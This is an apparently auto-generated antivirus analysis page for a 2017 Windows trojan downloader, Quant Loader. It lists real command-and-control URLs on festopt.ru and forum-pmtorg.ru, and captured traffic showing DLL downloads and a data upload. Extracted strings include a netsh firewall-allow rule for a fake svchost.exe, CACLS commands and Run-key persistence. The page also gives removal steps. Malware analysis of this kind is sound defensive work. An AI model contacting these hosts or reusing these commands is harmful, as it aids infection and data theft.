Gen.Trojan.Heur.RP.byWauykL0jc_f4a35c99f2

by malwarelabrobot on June 28th, 2017 in Malware Descriptions.

Gen:Trojan.Heur.RP.byW@auykL0jc (BitDefender), Trojan:Win32/Malex.gen!E (Microsoft), HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.MulDrop7.28203 (DrWeb), Gen:Trojan.Heur.RP.byW@auykL0jc (B) (Emsisoft), Downloader.Quanader (Symantec), Trojan.Win32.Pliskal (Ikarus), Gen:Trojan.Heur.RP.byW@auykL0jc (FSecure), Win32:Malware-gen (AVG), Win32:Malware-gen (Avast), Gen:Trojan.Heur.RP.byW@auykL0jc (AdAware), Trojan.Win32.Swrort.4.FD, mzpefinder_pcap_file.YR, TrojanSwrort.YR, TrojanLoadMoney.YR, GenericDownloader.YR (Lavasoft MAS)
Behaviour: Trojan, Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: f4a35c99f2c25dbafa703ae07b36002e
SHA1: a1cd057641a5f68979fd0c0b7d4c2520ebb4ef4a
SHA256: 02f71cb97ed8fa0ef73e45169d60351fbb92933fee2f4614dc428353fe052d42
SSDeep: 768:jnvjp84MgSGQmWVNHwQJmSi6avDyDytUyhW14oSShDA:DG4jSGQmWVNHwQJmSWrk14oSSh
Size: 28160 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MingWin32GCC3x, UPolyXv05_v6
Company: no certificate found
Created at: 2017-06-14 00:56:15
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

netsh.exe:3104
netsh.exe:3676
netsh.exe:2152
%original file name%.exe:600

The Trojan injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process netsh.exe:2152 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\comres (61 bytes)

The process %original file name%.exe:600 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\50624536\svchost.exe (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\50624536\svchost.exe:Zone.Identifier (0 bytes)

Registry activity

The process netsh.exe:3104 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

The process netsh.exe:3676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32]
"eapqec.dll,-101" = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies."
"eapqec.dll,-100" = "EAP Quarantine Enforcement Client"
"eapqec.dll,-103" = "Microsoft Corporation"
"eapqec.dll,-102" = "1.0"
"tsgqec.dll,-101" = "Provides RD Gateway enforcement for NAP"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32]
"tsgqec.dll,-103" = "Microsoft Corporation"
"tsgqec.dll,-100" = "RD Gateway Quarantine Enforcement Client"
"napipsec.dll,-2" = "Provides IPsec based enforcement for Network Access Protection"
"napipsec.dll,-3" = "Microsoft Corporation"
"napipsec.dll,-1" = "IPsec Relying Party"
"napipsec.dll,-4" = "1.0"
"tsgqec.dll,-102" = "1.0"
"dhcpqec.dll,-103" = "1.0"
"dhcpqec.dll,-102" = "Microsoft Corporation"
"dhcpqec.dll,-101" = "Provides DHCP based enforcement for NAP"
"dhcpqec.dll,-100" = "DHCP Quarantine Enforcement Client"

The process netsh.exe:2152 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

The process %original file name%.exe:600 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

Dropped PE files

MD5 File path
b7b90e1cc763199c625c330ae1400ca1 c:\Users\"%CurrentUserName%"\AppData\Roaming\z\bs.dll
d3979db259f55d59b4edb327673c1905 c:\Users\"%CurrentUserName%"\AppData\Roaming\z\sqlite3.dll
badf8311607462f3d4efa6363443e082 c:\Users\"%CurrentUserName%"\AppData\Roaming\z\zs.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 14932 15360 3.70318 5ab8a076c4111dd689b32d6ff53958b1
.data 20480 7328 7680 1.03866 40b27f37890ec39787affa11efb949a1
.rdata 28672 304 512 2.51456 752efc9c7c96386b6cd6c62c3931568d
.bss 32768 28144 0 0 d41d8cd98f00b204e9800998ecf8427e
.idata 61440 2316 2560 2.98853 ee0b6aaca850b5e0d68599eaf94c297d
.rsrc 65536 557 1024 2.35449 1be1d800aab85c6e6a6daa7800100720

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://festopt.ru/q/index.php?id=50624536&c=1&mk=a20cae&il=H&vr=1.44&bt=32 193.124.184.166
hxxp://festopt.ru/q/lib/zs.dll.c 193.124.184.166
hxxp://festopt.ru/q/lib/sql.dll.c 193.124.184.166
hxxp://festopt.ru/q/lib/bs.dll.c 193.124.184.166
hxxp://forum-pmtorg.ru/q/index.php?id=50624536&c=1&mk=a20cae&il=H&vr=1.44&bt=32 193.124.184.162
hxxp://forum-pmtorg.ru/ 193.124.184.162
hxxp://festopt.ru/q/data.php 193.124.184.166
hxxp://festopt.ru/q/index.php?id=50624536&c=2&mk=a20cae&il=H&vr=1.44&bt=32 193.124.184.166
hxxp://festopt.ru/q/lib/zs.dll.chxxp://festopt.ru/q/lib/zs.dll.c 193.124.184.166
hxxp://festopt.ru/q/lib/sql.dll.chxxp://festopt.ru/q/lib/sql.dll.c 193.124.184.166
hxxp://festopt.ru/q/lib/bs.dll.chxxp://festopt.ru/q/lib/bs.dll.c 193.124.184.166
hxxp://forum-pmtorg.ru/q/index.php?id=50624536&c=2&mk=a20cae&il=H&vr=1.44&bt=32 193.124.184.162


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Quant Loader Download Request
ET POLICY PE EXE or DLL Windows file download HTTP
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected

Traffic

GET /q/index.php?id=50624536&c=2&mk=a20cae&il=H&vr=1.44&bt=32 HTTP/1.1
Host: forum-pmtorg.ru
Cookie: marker=5b404c4043dcb64da23196f439175b1603a02ab3; id=7974861f77a390d75794b967acec99af


HTTP/1.1 301 Moved Permanently
Server: nginx/1.10.2
Date: Tue, 27 Jun 2017 02:03:37 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.16
Location: /
....



GET / HTTP/1.1

Host: forum-pmtorg.ru
Connection: Keep-Alive
Cookie: marker=5b404c4043dcb64da23196f439175b1603a02ab3; id=7974861f77a390d75794b967acec99af


HTTP/1.1 500 Internal Server Error
Server: nginx/1.10.2
Date: Tue, 27 Jun 2017 02:03:37 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.16


GET /q/index.php?id=50624536&c=1&mk=a20cae&il=H&vr=1.44&bt=32 HTTP/1.1
Host: forum-pmtorg.ru


HTTP/1.1 301 Moved Permanently
Server: nginx/1.10.2
Date: Tue, 27 Jun 2017 02:02:36 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.16
Location: /
....



GET / HTTP/1.1

Host: forum-pmtorg.ru
Connection: Keep-Alive


HTTP/1.1 500 Internal Server Error
Server: nginx/1.10.2
Date: Tue, 27 Jun 2017 02:02:36 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.16
Set-Cookie: marker=5b404c4043dcb64da23196f439175b1603a02ab3; expires=Sat, 26-Aug-2017 02:02:36 GMT; path=/
Set-Cookie: id=7974861f77a390d75794b967acec99af; expires=Sat, 26-Aug-2017 02:02:36 GMT; path=/
HTTP/1.1 500 Internal Server Error..Server: nginx/1.10.2..Date: Tue, 2
7 Jun 2017 02:02:36 GMT..Content-Type: text/html; charset=UTF-8..Conte
nt-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.4.16..Set-Co
okie: marker=5b404c4043dcb64da23196f439175b1603a02ab3; expires=Sat, 26
-Aug-2017 02:02:36 GMT; path=/..Set-Cookie: id=7974861f77a390d75794b96
7acec99af; expires=Sat, 26-Aug-2017 02:02:36 GMT; path=/..


POST /q/data.php HTTP/1.1
Host: festopt.ru
User-Agent: Uploador
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Content-Type: multipart/form-data; boundary=83950624.txt
Connection: Keep-Alive
Content-Length: 199

--83950624.txt
Content-Disposition: form-data; name="data"; filename="83950624.txt"
Content-Type: application/octet-stream

Hostname: WIN-UK0FFOO83I6

Collected: 0 items


--83950624.txt--

HTTP/1.1 200 OK
Server: nginx/1.10.1
Date: Tue, 27 Jun 2017 02:02:40 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive


GET /q/index.php?id=50624536&c=1&mk=a20cae&il=H&vr=1.44&bt=32 HTTP/1.1
Host: festopt.ru


HTTP/1.1 200 OK
Server: nginx/1.10.1
Date: Tue, 27 Jun 2017 02:02:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
4..pwd;..0......



GET /q/lib/zs.dll.c HTTP/1.1

Host: festopt.ru
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.10.1
Date: Tue, 27 Jun 2017 02:02:36 GMT
Content-Type: text/x-csrc
Content-Length: 712192
Connection: keep-alive
Last-Modified: Sat, 22 Apr 2017 17:40:35 GMT
ETag: "ade00-54dc4df124ac0"
Accept-Ranges: bytes
MZP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L....^B*............
.....`...z......Ln.......p....@...........................C...........
............................B.O.....B..*...pC..Z....................B.
l.....................................................................
..............CODE....d^.......`.................. ..`DATA.....S...p..
.T...d..............@...BSS.......8..............................idata
...*....B..,..................@....edata..O.....B.....................
@..P.reloc..l.....B.....................@..P.rsrc....Z...pC..Z........
..........@..P..............C.....................@..P................
......................................................................
......................................................................
..............................................@...Boolean...........@.
.False.True.@.,.@...Char..........@.@...Integer...........X.@...Byte..
........l.@...Word............@...Cardinal............@...String..@...
WideString..@...OleVariant..@...............................@.........
.A@..A@..A@..A@..A@.$?@.@?@.|?@..TObject..@...TObject..@........System
..8.@...IInterface....................F.System....h.@...IDispatch4.@..
...............F.System.......D$...!Z...D$...?Z...D$...IZ......@...@..
.@....................F..@..........@.0.@...@.....................

<<< skipped >>>

GET /q/lib/sql.dll.c HTTP/1.1

Host: festopt.ru
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.10.1
Date: Tue, 27 Jun 2017 02:02:36 GMT
Content-Type: text/x-csrc
Content-Length: 522752
Connection: keep-alive
Last-Modified: Tue, 04 Oct 2016 04:09:43 GMT
ETag: "7fa00-53e023aecafc0"
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......AU.g.4.4.4.4
.4.4.LQ4.4.4.4.4m4.4jBi4.4.4jB\4.4.4jBh4^4.4jBl4.4.4jBY4.4.4jB_4.4.4Ri
ch.4.4........................PE..L.....KM...........!................
^j.......................................@............@...............
..................L...(...............................................
....................P...@............................................t
ext............................... ..`.rdata..........................
....@..@.data...d,..........................@....rsrc.................
..............@..@.reloc...4.......6..................@..B............
......................................................................
......................................................................
......................................................................
......................................................................
............................................U.....SVW.}..........Z....
H..t..........&..:..&..u.BF....H..x...........&......&.. .u.....}.....
u.3...(...U..u..$.?.t.@.8.u. .%...?..(.....E..u....}....>......~!..
H..t..........&..:..&..u.AF....H..x........&.........&.. .u..U......t.
<=u._^.....[..]..U..u.....u....(..|._^3.[..]...........U...E....w..
...(..].3.].......................;.............~.....................
.....;.............~..........U..Q.E.V...w .}...U.........u...........
.t........3.^Y].h4...h.0..h....j...F..........^Y].......U.....S.].

<<< skipped >>>

GET /q/lib/bs.dll.c HTTP/1.1

Host: festopt.ru
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.10.1
Date: Tue, 27 Jun 2017 02:02:36 GMT
Content-Type: text/x-csrc
Content-Length: 58368
Connection: keep-alive
Last-Modified: Thu, 26 Jan 2017 00:53:31 GMT
ETag: "e400-546f4c72af8c0"
Accept-Ranges: bytes
MZP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L....^B*............
.........0......@.............@.......................................
...........................p..>....`...............................
......................................................................
.................CODE....X........................... ..`DATA....L....
.......................@...BSS.....U................................id
ata.......`......................@....edata..>....p................
......@..P.reloc..............................@..P.rsrc...............
................@..P....................................@..P..........
......................................................................
......................................................................
....................................................@...StringX.@.....
........................X.@..........8@..8@..8@..8@..8@.L7@.h7@..7@..T
Object.%.a_....%.a_....%.a_....%.a_....%|a_....%xa_....%ta_....%pa_...
.%la_....%ha_....Ú_....%`a_....%.a_....%\a_....%Xa_....%.a_....%Ta_.
...%Pa_....%La_....%Ha_....Ú_....%@a_....%<a_....Š_....J_....
_....%,a_....%(a_....%$a_....%.a_....% a_....%.a_....%.a_....%.a_..
..%.a_....%.a_....%.a_....%.a_....%.a_...S........T......D$,.t...\$0..
..D[....%.a_....%.a_....%.a_....%.a_....%.`_....%.`_....%.`_....%.

<<< skipped >>>

GET /q/index.php?id=50624536&c=2&mk=a20cae&il=H&vr=1.44&bt=32 HTTP/1.1
Host: festopt.ru


HTTP/1.1 200 OK
Server: nginx/1.10.1
Date: Tue, 27 Jun 2017 02:03:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
4..mbs;..0......



GET /q/lib/zs.dll.chXXp://festopt.ru/q/lib/zs.dll.c HTTP/1.1

Host: festopt.ru
Cache-Control: no-cache


HTTP/1.1 404 Not Found
Server: nginx/1.10.1
Date: Tue, 27 Jun 2017 02:03:37 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: keep-alive
140..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html
><head>.<title>404 Not Found</title>.</head>
;<body>.<h1>Not Found</h1>.<p>The requested UR
L /q/lib/zs.dll.chXXp://festopt.ru/q/lib/zs.dll.c was not found on thi
s server.</p>.<hr>.<address>Apache/2.4.10 (Debian) S
erver at festopt.ru Port 80</address>.</body></html>
...0..
....



GET /q/lib/sql.dll.chXXp://festopt.ru/q/lib/sql.dll.c HTTP/1.1

Host: festopt.ru
Cache-Control: no-cache


HTTP/1.1 404 Not Found
Server: nginx/1.10.1
Date: Tue, 27 Jun 2017 02:03:37 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: keep-alive
142..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html
><head>.<title>404 Not Found</title>.</head>
;<body>.<h1>Not Found</h1>.<p>The requested UR
L /q/lib/sql.dll.chXXp://festopt.ru/q/lib/sql.dll.c was not found on t
his server.</p>.<hr>.<address>Apache/2.4.10 (Debian)
Server at festopt.ru Port 80</address>.</body></html&g
t;...0..
....



GET /q/lib/bs.dll.chXXp://festopt.ru/q/lib/bs.dll.c HTTP/1.1

Host: festopt.ru
Cache-Control: no-cache


HTTP/1.1 404 Not Found
Server: nginx/1.10.1
Date: Tue, 27 Jun 2017 02:03:37 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: keep-alive
140..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html
><head>.<title>404 Not Found</title>.</head>
;<body>.<h1>Not Found</h1>.<p>The requested UR
L /q/lib/bs.dll.chXXp://festopt.ru/q/lib/bs.dll.c was not found on thi
s server.</p>.<hr>.<address>Apache/2.4.10 (Debian) S
erver at festopt.ru Port 80</address>.</body></html>
...0..HTTP/1.1 404 Not Found..Server: nginx/1.10.1..Date: Tue, 27 Jun
2017 02:03:37 GMT..Content-Type: text/html; charset=iso-8859-1..Transf
er-Encoding: chunked..Connection: keep-alive..140..<!DOCTYPE HTML P
UBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<tit
le>404 Not Found</title>.</head><body>.<h1>
Not Found</h1>.<p>The requested URL /q/lib/bs.dll.chXXp://
festopt.ru/q/lib/bs.dll.c was not found on this server.</p>.<
hr>.<address>Apache/2.4.10 (Debian) Server at festopt.ru Port
80</address>.</body></html>...0..


The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_600:

.text
`.data
.rdata
@.bss
.idata
.rsrc
/index.php
%s:%u: failed assertion `%s'
:Zone.Identifier
urlmon
URLDownloadToFileA
50624536
c:\%original file name%.exe
C:\Users\"%CurrentUserName%"\AppData\Roaming\z\
C:\Users\"%CurrentUserName%"\AppData\Roaming\50624536\
c:\users\"%CurrentUserName%"\appdata\roaming\50624536\svchost.exe
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_
50624536\
c:\users\"%CurrentUserName%"\appdata\roaming\50624536
C:\Users\"%CurrentUserName%"\AppData\Roaming
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\
88dcd395-b062-45b3-a6cd-79f37c0eba08
883950624536793700
netsh advfirewall firewall add rule name="Quant" program="c:\users\"%CurrentUserName%"\appdata\roaming\50624536\svchost.exe" dir=Out action=allow
cmd /c echo Y|CACLS "c:\users\"%CurrentUserName%"\appdata\roaming\50624536\svchost.exe" /P "adm:R"
cmd /c echo Y|CACLS "c:\users\"%CurrentUserName%"\appdata\roaming\50624536" /P "adm:R"
c:\users\"%CurrentUserName%"\appdata\roaming\50624536\svchost.exe:Zone.Identifier
RegCloseKey
RegCreateKeyExA
RegOpenKeyA
RegOpenKeyExA
WinExec
ShellExecuteA
ShellExecuteExA
InternetOpenUrlA
ADVAPI32.DLL
KERNEL32.dll
msvcrt.dll
SHELL32.DLL
WININET.DLL
<assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="q" type="win32"/>
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
0123456789\

svchost.exe_1732:

.text
`.data
.rdata
@.bss
.idata
.rsrc
/index.php
%s:%u: failed assertion `%s'
:Zone.Identifier
urlmon
URLDownloadToFileA
50624536
hXXp://festopt.ru/q/index.php?id=50624536&c=2&mk=a20cae&il=H&vr=1.44&bt=32
hXXp://forum-pmtorg.ru/q/index.php?id=50624536&c=2&mk=a20cae&il=H&vr=1.44&bt=32
C:\Users\"%CurrentUserName%"\AppData\Roaming\z\bs.dll
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\per
c:\users\"%CurrentUserName%"\appdata\roaming\50624536\svchost.exe
C:\Users\"%CurrentUserName%"\AppData\Roaming\z\
C:\Users\"%CurrentUserName%"\AppData\Roaming\50624536\
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_
50624536\
hXXp://festopt.ru/q/
C:\Users\"%CurrentUserName%"\AppData\Roaming
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\
88dcd395-b062-45b3-a6cd-79f37c0eba08
883950624536793700
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run [8]
C:\Users\"%CurrentUserName%"\AppData\Roaming\z\zs.dllC:\Users\"%CurrentUserName%"\AppData\Roaming\z\zs.dll
hXXp://festopt.ru/q/lib/zs.dll.chXXp://festopt.ru/q/lib/zs.dll.c
C:\Users\"%CurrentUserName%"\AppData\Roaming\z\sqlite3.dllC:\Users\"%CurrentUserName%"\AppData\Roaming\z\sqlite3.dll
hXXp://festopt.ru/q/lib/sql.dll.chXXp://festopt.ru/q/lib/sql.dll.c
C:\Users\"%CurrentUserName%"\AppData\Roaming\z\bs.dllC:\Users\"%CurrentUserName%"\AppData\Roaming\z\bs.dll
hXXp://festopt.ru/q/lib/bs.dll.chXXp://festopt.ru/q/lib/bs.dll.c
C:\Users\"%CurrentUserName%"\AppData\Roaming\z\zs.dll
C:\Users\"%CurrentUserName%"\AppData\Roaming\z\sqlite3.dll
RegCloseKey
RegCreateKeyExA
RegOpenKeyA
RegOpenKeyExA
WinExec
ShellExecuteA
ShellExecuteExA
InternetOpenUrlA
ADVAPI32.DLL
KERNEL32.dll
msvcrt.dll
SHELL32.DLL
WININET.DLL
<assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="q" type="win32"/>
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
0123456789\


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    netsh.exe:3104
    netsh.exe:3676
    netsh.exe:2152
    %original file name%.exe:600

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\comres (61 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\50624536\svchost.exe (56 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\50624536\svchost.exe:Zone.Identifier (0 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet

x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now